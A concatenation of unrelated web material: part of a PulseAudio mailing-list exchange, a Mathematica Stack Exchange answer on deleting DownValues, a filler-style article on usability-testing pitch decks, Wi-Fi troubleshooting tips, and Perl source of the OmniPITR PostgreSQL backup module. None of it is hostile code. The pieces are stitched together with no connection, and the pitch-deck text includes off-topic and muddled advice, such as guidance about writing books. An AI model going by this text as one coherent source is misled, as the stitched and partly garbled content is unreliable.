>> like recording from an unplugged
>> mic or line-in input.
> And there's no silence detection?
No, there isn't. This would have to be implemented on application level.
>>> 2. If I run it for 20 seconds, with 10 seconds of sinusoidal data
>>> followed by 10 seconds of null data, the file ends up with anything
>>> from 30 to 40 seconds worth of data in it.
>>>
>>> 3. The files written from case 2, above, show the initial sinusoidal
>>> data as expected, but then, following data stream interruption, about
>>> 5 to 10 seconds of switching back and forth between segments of
>>> sinusoidal data and null data, before finally settling to null data
>>> only till the end of file.
>> Did you test if the same happens with parec? If yes, are there any log
>> messages
>> during the time?
> Just did it and the result is the same. Attached is the relevant part
> of the syslog.
This looks like a bug but the log is not verbose enough. The best way to
get more
information is to run pulseaudio with debugging enabled. You might need
to disable
autospawn in client.conf or stop the user service when using systemd
before you
can do so. Then run pulseaudio -vvvv from the command line.
More information about the pulseaudio-discuss mailing list
|
__label__pos
| 0.587189 |
Take the 2-minute tour ×
Mathematica Stack Exchange is a question and answer site for users of Mathematica. It's 100% free, no registration required.
How can I clear a subset of a symbol's DownValues ?
For example, suppose I have created some DownValues for $f$ like this:
(f[Sequence @@ #] = Plus @@ #) & /@ Subsets[{1, 2, 3}];
f[x_, y_] := x y
DownValues[f]
(* {HoldPattern[f[]] :> 0, HoldPattern[f[1]] :> 1,
HoldPattern[f[2]] :> 2, HoldPattern[f[3]] :> 3,
HoldPattern[f[1, 2]] :> 3, HoldPattern[f[1, 3]] :> 4,
HoldPattern[f[2, 3]] :> 5, HoldPattern[f[1, 2, 3]] :> 6,
HoldPattern[f[x_, y_]] :> x y} *)
I now wish to clear all the downvalues for which $f$ has exactly $n$ numerical arguments. In other words I would like to have a function selectiveClear[f,n] such that this would happen:
selectiveClear[f,2]
DownValues[f]
(* {HoldPattern[f[]] :> 0, HoldPattern[f[1]] :> 1,
HoldPattern[f[2]] :> 2, HoldPattern[f[3]] :> 3,
HoldPattern[f[1, 2, 3]] :> 6, HoldPattern[f[x_, y_]] :> x y} *)
I have tried using Cases to pick a subset of the DownValues, but I can't seem to get the pattern correct.
share|improve this question
3
Related: stackoverflow.com/q/5086749/618728 – Mr.Wizard Jul 6 '12 at 11:30
@Mr.Wizard, the link is very useful too, thanks. I always forget to search on stackoverflow. It would be nice if the Mathematica questions on there could be imported into this site somehow. – Simon Woods Jul 6 '12 at 13:09
They can be imported, but only on a case-by-case basis as they're still generally on-topic over there. We have to beg and plead for them to be migrated, and it rarely happens with questions that are older with good answers already. – rcollyer Jul 6 '12 at 14:36
1 Answer 1
up vote 13 down vote accepted
DownValues[f] =
DeleteCases[DownValues[f], _@_[_?NumericQ, _?NumericQ] :> _]
{HoldPattern[f[]] :> 0, HoldPattern[f[1]] :> 1,
HoldPattern[f[2]] :> 2, HoldPattern[f[3]] :> 3,
HoldPattern[f[1, 2, 3]] :> 6, HoldPattern[f[x_, y_]] :> x y}
It is possible to make this pattern fail if you want also to clear something like:
f[1, 2] /; $op := "$op is active"
This would catch it:
DeleteCases[
DownValues[f],
(x_ :> _) /; ! x ~FreeQ~ Verbatim[f][_?NumericQ, _?NumericQ]
]
Szabolcs remarks it is valuable to mention Unset in this context.
I described the use of that and related functions here.
share|improve this answer
Thanks, this is just what I needed. I've used Repeated[_?NumericQ,{n}] to get a function that removes downvalues with n arguments. – Simon Woods Jul 6 '12 at 13:07
@Simon glad I could help. That is a good generalization. – Mr.Wizard Jul 6 '12 at 13:13
Your Answer
discard
By posting your answer, you agree to the privacy policy and terms of service.
Not the answer you're looking for? Browse other questions tagged or ask your own question.
|
__label__pos
| 0.898419 |
Pitchgrade
Pitchgrade
Presentations made painless
Usability Testing Report Pitch Deck Template
Jan 12, 2023
This article provides a comprehensive guide to creating a usability testing report pitch deck template. Usability testing is a process of testing how users interact with a website or application, and is a key part of the development process for any website or product. By creating and using a usability testing report pitch deck template, teams can quickly and accurately track user experience data and make informed decisions about the user experience. This article will explain the key components of a usability testing report pitch deck template and provide step-by-step instructions for creating one.
1. Introduction
• Overview of Usability Testing
• Benefits of Usability Testing
• What We'll Cover
2. The Usability Testing Process
• Goals & Objectives
• Target Audience
• Tools
• Test Participants
• Test Scenarios
• Results & Analysis
3. Our Usability Testing Results
• Summary
• Findings & Recommendations
• User Behaviors
• Metrics
4. Conclusion
• Impact of Usability Testing
• Next Steps
• Questions & Answers
Tips for Creating a Great Usability Testing Report Pitch Deck
Start by creating a template that outlines the goals, objectives, and key deliverables of the usability testing report.
When you create a template, keep it simple and clear. You can use a template like a checklist to ensure that you cover all the necessary parts of the usability testing report. However, remember to leave enough room for you to add your own observations and comments. The template is meant to be a guideline, rather than an instruction manual.
Include visuals, such as graphs and charts, to illustrate the report's findings.
Including visuals, such as photographs, graphs, charts, and infographics can help to engage the reader. Make sure that the visuals you choose are relevant to the report and that they accurately convey the information that you are trying to convey.
Including visuals can also help to break up the text, making the report easier to read. Additionally, visuals can help to illustrate the report's findings, conveying information more effectively than text alone.
Make sure the template is organized into logical sections and subsections.
Having a template is a great way to ensure that you follow a logical process in writing a book, however, to make sure you're not caught off guard, you should also keep a list of topics that need to be included in your book. Additionally, you should have a list of sources you will use to support the claims you make.
Reading lists or bibliographies are common in academic or scholarly texts; however, you can also include a list of resources in other types of books. Consider keeping a list of the names of the people you will interview for the book. This will help you to track down people to interview and to ensure that you interview the right people for the book. You can also keep track of potential images or other media that you can use in your book to help make your points.
By keeping lists of topics, sources, and images, you can ensure that you include everything that is necessary for your book.
Identify and highlight the most important findings and results.
When presenting your data, it is essential to include an explanation of your findings. This will help to ensure that your audience understands the data and can draw their own conclusions.
Utilize a consistent visual language and design elements throughout the pitch deck.
Consistency is key in creating a sense of uniformity in your presentation. For example, using the same font throughout your pitch deck makes it easier for investors to read and understand your presentation. It also makes your presentation look more professional and polished.
Another benefit of consistency is that it sets the stage for your story. Investors want to know who you are and what you're all about. The consistency of your visual language helps them get to know you faster and understand your mission and vision.
Make sure to include a slide summarizing the key takeaways and recommendations.
The best way to summarize key takeaways and recommendations is to create a summary slide that includes bullet points that summarize the key takeaways and recommendations. This will allow the audience to quickly access the key takeaways and recommendations without having to listen to the entire presentation.
Frequently Asked Questions
How can I create a Usability Testing Report pitch deck?
A usability testing report pitch deck can be a great way to get ahead of the curve. A usability test is a simple way to find out how easy your product or service is to use. It's a great way to get feedback from your target audience and improve your product or service to make it more accessible for a wider audience.
The way to make a usability testing report appealing is to show how you will use the results of your test. So, include results from past usability tests that show how the information you gathered led to an improved product. This will make it easy for your audience to understand how usability testing can improve your business.
What are the most important aspects of Usability Testing Report pitch deck?
You're going to have to have a specific methodology for usability testing. You'll need to show how you'll go about performing the tests, including a process for recruiting participants, and a process for analyzing the data. If you already have a process in place, highlight that. If you're still working on a process, be sure to include that.
Why is it important that you create a Usability Testing Report pitch deck?
Designing a Usability Testing Report pitch deck is essential because when you're pitching to a client, you want to make sure that you're not just selling yourself and your service, but that you're selling the value of your work too. Your work should be able to speak for itself, but it's always good to have something concrete to show your client as well.
Who benefits from creating a Usability Testing Report pitch deck?
In my experience, the key to creating a Usability Testing Report pitch deck is to have a clear goal in mind. If your goal is to simply sell more software to your existing customers, then you will want to highlight how your software solves a pain point for your customers. If your goal is to acquire new customers, then you will want to highlight how your software can enable customers to achieve something they couldn't do before. In either case, you should focus on how your product will benefit your customers and how it will help them achieve their goals.
What are some extra considerations for improving my Usability Testing Report pitch deck?
Consider showing some of your testing data. This will help your audience understand user behavior and make it more likely that they'll agree with your testing findings. You should have a variety of data to share, so you can address every possible objection they might have.
For example, if they say, Our product is fine the way it is, you can show them data that shows your product isn't usable. If they say, Our product is fine the way it is, and it isn't worth the money to fix it, you can show them data that shows how much money can be saved by making the changes.
What are some resources for creating a Usability Testing Report pitch deck?
It can be difficult to know where to start when creating a usability report for a client. If you're feeling a little overwhelmed or are unsure of what exactly to include, I highly recommend using some of the great resources out there. One of my favourite resources is the Usability Testing Report Template from Usability.gov. This document provides a framework for you to work from and will provide a great starting point for your pitch deck. You can also check out other resources that can help you, such as this Usability Report Template from UXmatters.
What are some tips for creating a Usability Testing Report pitch deck?
Pitching deck creation is a process that requires you to use data to tell a story. The story is supported by data that gives the deck credibility. But there is more to it than just the data.
The data should be presented in a way that is easily understandable. The presentation should be as simple as possible. The data can be presented in the form of charts, graphs, and other visuals.
Simple charts are easy to understand and interpret. However, they must be used correctly to communicate the right message.
How can I make sure my Usability Testing Report pitch deck is successful?
The most important thing to remember is to be honest with the feedback. People who are giving you the feedback are doing so because they are interested in your product or service. They have put their time and effort into it, so they want to see your product succeed.
Be honest with them when you receive the feedback, and show that you are working on implementing their suggestions.
What are some common mistakes people make when creating a Usability Testing Report pitch deck?
When presenting usability testing results, avoid short-term and immediate implications and focus on the long-term changes and strategies. For example, if the results indicate that users are struggling to find a specific button, it may seem like an immediate fix to add a tooltip explaining where the button is. However, this may not be the correct choice, as it may lead to users missing out on other processes or features. A long-term solution may be to reposition the button in a more visible and accessible area on the interface.
How can I avoid making mistakes when creating a Usability Testing Report pitch deck?
Don't leave out the key details of the report. Don't assume that the people reading the pitch deck are familiar with usability testing. Make sure to include important details about the test participants and the testing process. Also include details about the types of problems that were identified and how the product will be improved based on the results of the testing.
What are some things I should keep in mind when creating a Usability Testing Report pitch deck?
When you are pitching a usability testing project, focus on the advantages and improvements that you can offer the client. While you may be pitching a project, the client is also looking for a solution to their usability issues. Convince them that you are the right person to help them.
Show them the value of your services as a usability testing expert. Talk about your previous experience and any case studies that you can share. Highlight your expertise and why you are the best person for the job.
Is there anything else I should know about creating a Usability Testing Report pitch deck?
You should always show the full journey your potential client wants to get to, and not just one part of it. Always present your findings in a way that shows you have a complete understanding of the client's needs, and can provide a full service to address them.
More Pitch Deck Templates
Want to create a presentation now?
• instantly
Instantly Create A Deck
Let PitchGrade do this for me
• smile
Hassle Free
We will create your text and designs for you. Sit back and relax while we do the work.
|
__label__pos
| 0.966097 |
Problems with Wi-Fi
wifi_problem
Although several improvements have been made recently to Internet speed and Wi-Fi, you may still encounter slow internet speeds and connection problems with the Wi-Fi. This is due to the fact that Wi-Fi operates in unregulated portions of the radio spectrum and Wi-Fi networks currently operate like a “a weak radio station in a busy city market” when trying to tune in. To efficiently tune in and get online, here a few pointers to help solve those Wi-Fi problems:
1. Try Rebooting the Routers
This may be the simplest solution to your Wi-Fi issues. Just try unplugging the power cord,wait a few seconds and then reconnect, if there are multiple routers or wireless access points(WAPs), reboot them all. Consumer or cheap Wi-Fi gear may need to be rebooted every few weeks to ensure that it works effectively. You can also turn the Wi-Fi off and on again on the computer as it would force the system to rescan for available networks
2. You Can Also Change the Location of The Routers and Computers
Just changing the location to just some meters away can make a big difference. Try a higher and more central location. You should keep the router away from large metal surfaces as these act as energy sinks and obstruct Wi-Fi signals. Also, keep the router away from mirrors and other reflective surfaces as these also affect Wi-Fi signals.
3. Watch for Overheating
It is important that the vents of the router are not blocked by any other equipment placed on top of it. The router already possesses a poorly ventilated box and not keeping these vents open may result in strange behavior from the router.
4. Updating the Firmware
Firmware updates are often done to improve performance. You should always check if the firmware is up to date if you run into problems. You can also apply available patches especially when using new devices. But be warned! Firmware updates may introduce bugs into the system, so only update the firmware when you run into problems.
5. Use A Larger or External Antenna
Wi-Fi antennas are typically a few centimeters long on the router and internal on your device. If you are having problems with reception, you can always use a larger or external antenna. Some routers may offer removable antennas which should be easy to buy and replace. An external antenna can help to boost the noise to signal on a desktop or laptop with a metal case. You can also create a parabolic dish antenna by using a vegetable strainer and work accessories.
6. Forget Previously Saved Networks
Sometimes computers and mobile devices may run into problems even if they are connected to previous networks. The password may be the same but network hardware or encryption methods may change. The best way to resolve this matter is to let your device forget a previously saved network. It acts as a sort of refresh for your device. Once this is done, if you need to reconnect, you most definitely can!
7. Change the Wi-Fi channel
Signal connection may be a problem especially if you live in quite a populated are as many devices use both 2.4 GHz and 5.8GHz bands. You can try changing the broadcast channel of the router. You can try running your router in automatic mode which will easily assign a clear channel. If you are still encountering problems, try using a Wi-Fi monitor so that you can see what channels are being used and be able to choose a channel that’s much less crowded.
Try changing encryption methods by using another encryption method. Some of these methods are WEP, WPA, WPA2. Your password encrypts transmitted traffic so you can change the encryption method and see what works best. Try using WPA as it is a huge improvement from using WEP. WPA encryption may not be supported by older 802.11b equipment, so stick to WEP.
<< Back
|
__label__pos
| 0.621579 |
root/trunk/omnipitr/lib/OmniPITR/Program/Backup/Master.pm
Revision 143, 20.7 kB (checked in by depesz, 8 years ago)
developer docs
Line
1 package OmniPITR::Program::Backup::Master;
2 use strict;
3 use warnings;
4
5 use base qw( OmniPITR::Program );
6
7 use Carp;
8 use OmniPITR::Tools qw( :all );
9 use English qw( -no_match_vars );
10 use File::Basename;
11 use Sys::Hostname;
12 use POSIX qw( strftime );
13 use File::Spec;
14 use File::Path qw( mkpath rmtree );
15 use File::Copy;
16 use Storable;
17 use Cwd;
18 use Getopt::Long qw( :config no_ignore_case );
19
20 =head1 run()
21
22 Main function wrapping all work.
23
24 Starts with getting list of compressions that have to be done, then it chooses where to compress to (important if we have remote-only destination), then it makes actual backup, and delivers to all
25 destinations.
26
27 =cut
28
29 sub run {
30 my $self = shift;
31 $self->get_list_of_all_necessary_compressions();
32 $self->choose_base_local_destinations();
33
34 $self->start_pg_backup();
35 $self->compress_pgdata();
36
37 $self->stop_pg_backup();
38 $self->compress_xlogs();
39
40 $self->deliver_to_all_destinations();
41
42 $self->log->log( 'All done%s.', $self->{ 'had_errors' } ? ' with errors' : '' );
43 exit( 1 ) if $self->{ 'had_errors' };
44
45 return;
46 }
47
48 =head1 deliver_to_all_destinations()
49
50 Simple wrapper to have single point to call to deliver backups to all requested backups.
51
52 =cut
53
54 sub deliver_to_all_destinations {
55 my $self = shift;
56
57 $self->deliver_to_all_local_destinations();
58
59 $self->deliver_to_all_remote_destinations();
60
61 return;
62 }
63
64 =head1 deliver_to_all_local_destinations()
65
66 Copies backups to all local destinations which are not also base destinations for their respective compressions.
67
68 =cut
69
70 sub deliver_to_all_local_destinations {
71 my $self = shift;
72 return unless $self->{ 'destination' }->{ 'local' };
73 for my $dst ( @{ $self->{ 'destination' }->{ 'local' } } ) {
74 next if $dst->{ 'path' } eq $self->{ 'base' }->{ $dst->{ 'compression' } };
75
76 my $B = $self->{ 'base' }->{ $dst->{ 'compression' } };
77
78 for my $type ( qw( data xlog ) ) {
79
80 my $filename = $self->get_archive_filename( $type, $dst->{ 'compression' } );
81 my $source_filename = File::Spec->catfile( $B, $filename );
82 my $destination_filename = File::Spec->catfile( $dst->{ 'path' }, $filename );
83
84 my $time_msg = sprintf 'Copying %s to %s', $source_filename, $destination_filename;
85 $self->log->time_start( $time_msg ) if $self->verbose;
86
87 my $rc = copy( $source_filename, $destination_filename );
88
89 $self->log->time_finish( $time_msg ) if $self->verbose;
90
91 unless ( $rc ) {
92 $self->log->error( 'Cannot copy %s to %s : %s', $source_filename, $destination_filename, $OS_ERROR );
93 $self->{ 'had_errors' } = 1;
94 }
95
96 }
97 }
98 return;
99 }
100
101 =head1 deliver_to_all_remote_destinations()
102
103 Delivers backups to remote destinations using rsync program.
104
105 =cut
106
107 sub deliver_to_all_remote_destinations {
108 my $self = shift;
109 return unless $self->{ 'destination' }->{ 'remote' };
110 for my $dst ( @{ $self->{ 'destination' }->{ 'remote' } } ) {
111
112 my $B = $self->{ 'base' }->{ $dst->{ 'compression' } };
113
114 for my $type ( qw( data xlog ) ) {
115
116 my $filename = $self->get_archive_filename( $type, $dst->{ 'compression' } );
117 my $source_filename = File::Spec->catfile( $B, $filename );
118 my $destination_filename = $dst->{ 'path' };
119 $destination_filename =~ s{/*\z}{/};
120 $destination_filename .= $filename;
121
122 my $time_msg = sprintf 'Copying %s to %s', $source_filename, $destination_filename;
123 $self->log->time_start( $time_msg ) if $self->verbose;
124
125 my $response = run_command( $self->{ 'temp-dir' }, $self->{ 'rsync-path' }, $source_filename, $destination_filename );
126
127 $self->log->time_finish( $time_msg ) if $self->verbose;
128
129 if ( $response->{ 'error_code' } ) {
130 $self->log->error( 'Cannot send archive %s to %s: %s', $source_filename, $destination_filename, $response );
131 $self->{ 'had_errors' } = 1;
132 }
133 }
134 }
135 return;
136 }
137
138 =head1 compress_xlogs()
139
140 Wrapper function which encapsulates all work required to compress xlog segments that accumulated during backup of data directory.
141
142 =cut
143
144 sub compress_xlogs {
145 my $self = shift;
146 $self->log->time_start( 'Compressing xlogs' ) if $self->verbose;
147 $self->start_writers( 'xlog' );
148
149 $self->tar_and_compress(
150 'work_dir' => $self->{ 'xlogs' } . '.real',
151 'tar_dir' => basename( $self->{ 'data-dir' } ),
152 );
153 $self->log->time_finish( 'Compressing xlogs' ) if $self->verbose;
154
155 return;
156 }
157
158 =head1 compress_pgdata()
159
160 Wrapper function which encapsulates all work required to compress data directory.
161
162 =cut
163
164 sub compress_pgdata {
165 my $self = shift;
166 $self->log->time_start( 'Compressing $PGDATA' ) if $self->verbose;
167 $self->start_writers( 'data' );
168
169 $self->tar_and_compress(
170 'work_dir' => dirname( $self->{ 'data-dir' } ),
171 'tar_dir' => basename( $self->{ 'data-dir' } ),
172 'excludes' => [ qw( pg_log/* pg_xlog/0* pg_xlog/archive_status/* postmaster.pid ) ],
173 );
174
175 $self->log->time_finish( 'Compressing $PGDATA' ) if $self->verbose;
176 return;
177 }
178
179 =head1 tar_and_compress()
180
181 Worker function which does all of the actual tar, and sending data to compression filehandles.
182
183 Takes hash (not hashref) as argument, and uses following keys from it:
184
185 =over
186
187 =item * tar_dir - which directory to compress
188
189 =item * work_dir - what should be current working directory when executing tar
190
191 =item * excludes - optional key, that (if exists) is treated as arrayref of shell globs (tar dir) of items to exclude from backup
192
193 =back
194
195 If tar will print anything to STDERR it will be logged. Error status code is ignored, as it is expected that tar will generate errors (due to files modified while archiving).
196
197 =cut
198
199 sub tar_and_compress {
200 my $self = shift;
201 my %ARGS = @_;
202
203 my @compression_command = ( $self->{ 'nice-path' }, $self->{ 'tar-path' }, 'cf', '-' );
204 if ( $ARGS{ 'excludes' } ) {
205 push @compression_command, map { sprintf '--exclude=%s/%s', $ARGS{ 'tar_dir' }, $_ } @{ $ARGS{ 'excludes' } };
206 }
207 push @compression_command, $ARGS{ 'tar_dir' };
208
209 my $compression_str = join ' ', map { quotemeta $_ } @compression_command;
210
211 $self->prepare_temp_directory();
212 my $tar_stderr_filename = File::Spec->catfile( $self->{ 'temp-dir' }, 'tar.stderr' );
213 $compression_str .= ' 2> ' . quotemeta( $tar_stderr_filename );
214
215 my $previous_dir = getcwd;
216 chdir $ARGS{ 'work_dir' } if $ARGS{ 'work_dir' };
217
218 my $tar;
219 unless ( open $tar, '-|', $compression_str ) {
220 $self->clean_and_die( 'Cannot start tar (%s) : %s', $compression_str, $OS_ERROR );
221 }
222
223 chdir $previous_dir if $ARGS{ 'work_dir' };
224
225 my $buffer;
226 while ( my $len = sysread( $tar, $buffer, 8192 ) ) {
227 while ( my ( $type, $fh ) = each %{ $self->{ 'writers' } } ) {
228 my $written = syswrite( $fh, $buffer, $len );
229 next if $written == $len;
230 $self->clean_and_die( "Writting %u bytes to filehandle for <%s> compression wrote only %u bytes ?!", $len, $written );
231 }
232 }
233 close $tar;
234
235 for my $fh ( values %{ $self->{ 'writers' } } ) {
236 close $fh;
237 }
238
239 delete $self->{ 'writers' };
240
241 my $stderr_output;
242 my $stderr;
243 unless ( open $stderr, '<', $tar_stderr_filename ) {
244 $self->log->log( 'Cannot open tar stderr file (%s) for reading: %s', $tar_stderr_filename );
245 return;
246 }
247 {
248 local $/;
249 $stderr_output = <$stderr>;
250 };
251 close $stderr;
252 return unless $stderr_output;
253 $self->log->log( 'Tar (%s) generated these output on stderr:', $compression_str );
254 $self->log->log( '==============================================' );
255 $self->log->log( '%s', $stderr_output );
256 $self->log->log( '==============================================' );
257 unlink $tar_stderr_filename;
258 return;
259 }
260
261 =head1 start_writers()
262
263 Starts set of filehandles, which write to file, or to compression program, to create final archives.
264
265 Each compression schema gets its own filehandle, and printing data to it, will pass it to file directly or through compression program that has been chosen based on command line arguments.
266
267 =cut
268
269 sub start_writers {
270 my $self = shift;
271 my $data_type = shift;
272
273 my %writers = ();
274
275 COMPRESSION:
276 while ( my ( $type, $dst_path ) = each %{ $self->{ 'base' } } ) {
277 my $filename = $self->get_archive_filename( $data_type, $type );
278
279 my $full_file_path = File::Spec->catfile( $dst_path, $filename );
280
281 if ( $type eq 'none' ) {
282 if ( open my $fh, '>', $full_file_path ) {
283 $writers{ $type } = $fh;
284 $self->log->log( "Starting \"none\" writer to $full_file_path" ) if $self->verbose;
285 next COMPRESSION;
286 }
287 $self->clean_and_die( 'Cannot write to %s : %s', $full_file_path, $OS_ERROR );
288 }
289
290 my @command = map { quotemeta $_ } ( $self->{ 'nice-path' }, $self->{ $type . '-path' }, '--stdout', '-' );
291 push @command, ( '>', quotemeta( $full_file_path ) );
292
293 $self->log->log( "Starting \"%s\" writer to %s", $type, $full_file_path ) if $self->verbose;
294 if ( open my $fh, '|-', join( ' ', @command ) ) {
295 $writers{ $type } = $fh;
296 next COMPRESSION;
297 }
298 $self->clean_and_die( 'Cannot open command. Error: %s, Command: %s', $OS_ERROR, \@command );
299 }
300 $self->{ 'writers' } = \%writers;
301 return;
302 }
303
304 =head1 get_archive_filename()
305
306 Helper function, which takes filetype and compression schema to use, and returns generated filename (based on filename-template command line option).
307
308 =cut
309
310 sub get_archive_filename {
311 my $self = shift;
312 my ( $type, $compression ) = @_;
313
314 my $ext = $compression eq 'none' ? '' : ext_for_compression( $compression );
315
316 my $filename = $self->{ 'filename-template' };
317 $filename =~ s/__FILETYPE__/$type/g;
318 $filename =~ s/__CEXT__/$ext/g;
319
320 return $filename;
321 }
322
323 =head1 stop_pg_backup()
324
325 Runs pg_stop_backup() PostgreSQL function, which is crucial in backup process.
326
327 This happens after data directory compression, but before compression of xlogs.
328
329 This function also removes temporary destination for xlogs (dst-backup for omnipitr-archive).
330
331 =cut
332
333 sub stop_pg_backup {
334 my $self = shift;
335
336 $self->prepare_temp_directory();
337
338 my @command = ( @{ $self->{ 'psql' } }, "SELECT pg_stop_backup()" );
339
340 $self->log->time_start( 'pg_stop_backup()' ) if $self->verbose;
341 my $status = run_command( $self->{ 'temp-dir' }, @command );
342 $self->log->time_finish( 'pg_stop_backup()' ) if $self->verbose;
343
344 $self->clean_and_die( 'Running pg_stop_backup() failed: %s', $status ) if $status->{ 'error_code' };
345
346 $status->{ 'stdout' } =~ s/\s*\z//;
347 $self->log->log( q{pg_stop_backup('omnipitr') returned %s.}, $status->{ 'stdout' } );
348
349 my $subdir = basename( $self->{ 'data-dir' } );
350
351 unlink( $self->{ 'xlogs' } );
352
353 return;
354 }
355
356 =head1 start_pg_backup()
357
358 Executes pg_start_backup() postgresql function, and (before it) creates temporary destination for xlogs (dst-backup for omnipitr-archive).
359
360 =cut
361
362 sub start_pg_backup {
363 my $self = shift;
364
365 my $subdir = basename( $self->{ 'data-dir' } );
366 $self->clean_and_die( 'Cannot create directory %s : %s', $self->{ 'xlogs' } . '.real', $OS_ERROR ) unless mkdir( $self->{ 'xlogs' } . '.real' );
367 $self->clean_and_die( 'Cannot create directory %s : %s', $self->{ 'xlogs' } . ".real/$subdir", $OS_ERROR ) unless mkdir( $self->{ 'xlogs' } . ".real/$subdir" );
368 $self->clean_and_die( 'Cannot create directory %s : %s', $self->{ 'xlogs' } . ".real/$subdir/pg_xlog", $OS_ERROR ) unless mkdir( $self->{ 'xlogs' } . ".real/$subdir/pg_xlog" );
369 $self->clean_and_die( 'Cannot symlink %s to %s: %s', $self->{ 'xlogs' } . ".real/$subdir/pg_xlog", $self->{ 'xlogs' } . $OS_ERROR )
370 unless symlink( $self->{ 'xlogs' } . ".real/$subdir/pg_xlog", $self->{ 'xlogs' } );
371
372 $self->prepare_temp_directory();
373
374 my @command = ( @{ $self->{ 'psql' } }, "SELECT pg_start_backup('omnipitr')" );
375
376 $self->log->time_start( 'pg_start_backup()' ) if $self->verbose;
377 my $status = run_command( $self->{ 'temp-dir' }, @command );
378 $self->log->time_finish( 'pg_start_backup()' ) if $self->verbose;
379
380 $self->clean_and_die( 'Running pg_start_backup() failed: %s', $status ) if $status->{ 'error_code' };
381
382 $status->{ 'stdout' } =~ s/\s*\z//;
383 $self->log->log( q{pg_start_backup('omnipitr') returned %s.}, $status->{ 'stdout' } );
384
385 return;
386 }
387
388 =head1 clean_and_die()
389
390 Helper function called by other parts of code - removes temporary destination for xlogs, and exits program with logging passed message.
391
392 =cut
393
394 sub clean_and_die {
395 my $self = shift;
396 my @msg_with_args = @_;
397 rmtree( $self->{ 'xlogs' } . '.real', $self->{ 'xlogs' } );
398 $self->log->fatal( @msg_with_args );
399 }
400
401 =head1 choose_base_local_destinations()
402
403 Chooses single local destination for every compression schema required by destinations specifications.
404
405 In case some compression schema exists only for remote destination, local temp directory is created in --temp-dir location.
406
407 =cut
408
409 sub choose_base_local_destinations {
410 my $self = shift;
411
412 my $base = { map { ( $_ => undef ) } @{ $self->{ 'compressions' } } };
413 $self->{ 'base' } = $base;
414
415 for my $dst ( @{ $self->{ 'destination' }->{ 'local' } } ) {
416 my $type = $dst->{ 'compression' };
417 next if defined $base->{ $type };
418 $base->{ $type } = $dst->{ 'path' };
419 }
420
421 my @unfilled = grep { !defined $base->{ $_ } } keys %{ $base };
422
423 return if 0 == scalar @unfilled;
424 $self->log->log( 'These compression(s) were given only for remote destinations. Usually this is not desired: %s', join( ', ', @unfilled ) );
425
426 $self->prepare_temp_directory();
427 for my $type ( @unfilled ) {
428 my $tmp_dir = File::Spec->catfile( $self->{ 'temp-dir' }, $type );
429 mkpath( $tmp_dir );
430 $base->{ $type } = $tmp_dir;
431 }
432
433 return;
434 }
435
436 =head1 DESTROY()
437
438 Destroctor for object - removes temp directory on program exit.
439
440 =cut
441
442 sub DESTROY {
443 my $self = shift;
444 return unless $self->{ 'temp-dir-prepared' };
445 rmtree( $self->{ 'temp-dir-prepared' } );
446 return;
447 }
448
449 =head1 prepare_temp_directory()
450
451 Helper function, which builds path for temp directory, and creates it.
452
453 Path is generated by using given temp-dir and 'omnipitr-backup-master' named.
454
455 For example, for temp-dir '/tmp' used temp directory would be /tmp/omnipitr-backup-master.
456
457 =cut
458
459 sub prepare_temp_directory {
460 my $self = shift;
461 return if $self->{ 'temp-dir-prepared' };
462 my $full_temp_dir = File::Spec->catfile( $self->{ 'temp-dir' }, basename( $PROGRAM_NAME ) );
463 mkpath( $full_temp_dir );
464 $self->{ 'temp-dir' } = $full_temp_dir;
465 $self->{ 'temp-dir-prepared' } = $full_temp_dir;
466 return;
467 }
468
469 =head1 get_list_of_all_necessary_compressions()
470
471 Scans list of destinations, and gathers list of all compressions that have to be made.
472
473 This is to be able to compress file only once even when having multiple destinations that require compressed format.
474
475 =cut
476
477 sub get_list_of_all_necessary_compressions {
478 my $self = shift;
479
480 my %compression = ();
481
482 for my $dst_type ( qw( local remote ) ) {
483 next unless my $dsts = $self->{ 'destination' }->{ $dst_type };
484 for my $destination ( @{ $dsts } ) {
485 $compression{ $destination->{ 'compression' } } = 1;
486 }
487 }
488 $self->{ 'compressions' } = [ keys %compression ];
489 return;
490 }
491
492 =head1 read_args()
493
494 Function which does all the parsing, and transformation of command line arguments.
495
496 =cut
497
498 sub read_args {
499 my $self = shift;
500
501 my @argv_copy = @ARGV;
502
503 my %args = (
504 'temp-dir' => $ENV{ 'TMPDIR' } || '/tmp',
505 'gzip-path' => 'gzip',
506 'bzip2-path' => 'bzip2',
507 'lzma-path' => 'lzma',
508 'tar-path' => 'tar',
509 'nice-path' => 'nice',
510 'psql-path' => 'psql',
511 'rsync-path' => 'rsync',
512 'database' => 'postgres',
513 'filename-template' => '__HOSTNAME__-__FILETYPE__-^Y-^m-^d.tar__CEXT__',
514 );
515
516 croak( 'Error while reading command line arguments. Please check documentation in doc/omnipitr-backup-master.pod' )
517 unless GetOptions(
518 \%args,
519 'data-dir|D=s',
520 'database|d=s',
521 'host|h=s',
522 'port|p=i',
523 'username|U=s',
524 'xlogs|x=s',
525 'dst-local|dl=s@',
526 'dst-remote|dr=s@',
527 'temp-dir|t=s',
528 'log|l=s',
529 'filename-template|f=s',
530 'pid-file',
531 'verbose|v',
532 'gzip-path|gp=s',
533 'bzip2-path|bp=s',
534 'lzma-path|lp=s',
535 'nice-path|np=s',
536 'psql-path|pp=s',
537 'tar-path|tp=s',
538 'rsync-path|rp=s',
539 );
540
541 croak( '--log was not provided - cannot continue.' ) unless $args{ 'log' };
542 for my $key ( qw( log filename-template ) ) {
543 $args{ $key } =~ tr/^/%/;
544 }
545
546 for my $key ( grep { !/^dst-(?:local|remote)$/ } keys %args ) {
547 $self->{ $key } = $args{ $key };
548 }
549
550 for my $type ( qw( local remote ) ) {
551 my $D = [];
552 $self->{ 'destination' }->{ $type } = $D;
553
554 next unless defined $args{ 'dst-' . $type };
555
556 my %temp_for_uniq = ();
557 my @items = grep { !$temp_for_uniq{ $_ }++ } @{ $args{ 'dst-' . $type } };
558
559 for my $item ( @items ) {
560 my $current = { 'compression' => 'none', };
561 if ( $item =~ s/\A(gzip|bzip2|lzma)=// ) {
562 $current->{ 'compression' } = $1;
563 }
564 $current->{ 'path' } = $item;
565 push @{ $D }, $current;
566 }
567 }
568
569 $self->{ 'filename-template' } = strftime( $self->{ 'filename-template' }, localtime time() );
570 $self->{ 'filename-template' } =~ s/__HOSTNAME__/hostname()/ge;
571
572 # We do it here so it will actually work for reporing problems in validation
573 $self->{ 'log_template' } = $args{ 'log' };
574 $self->{ 'log' } = OmniPITR::Log->new( $self->{ 'log_template' } );
575
576 $self->log->log( 'Called with parameters: %s', join( ' ', @argv_copy ) ) if $self->verbose;
577
578 my @psql = ();
579 push @psql, $self->{ 'psql-path' };
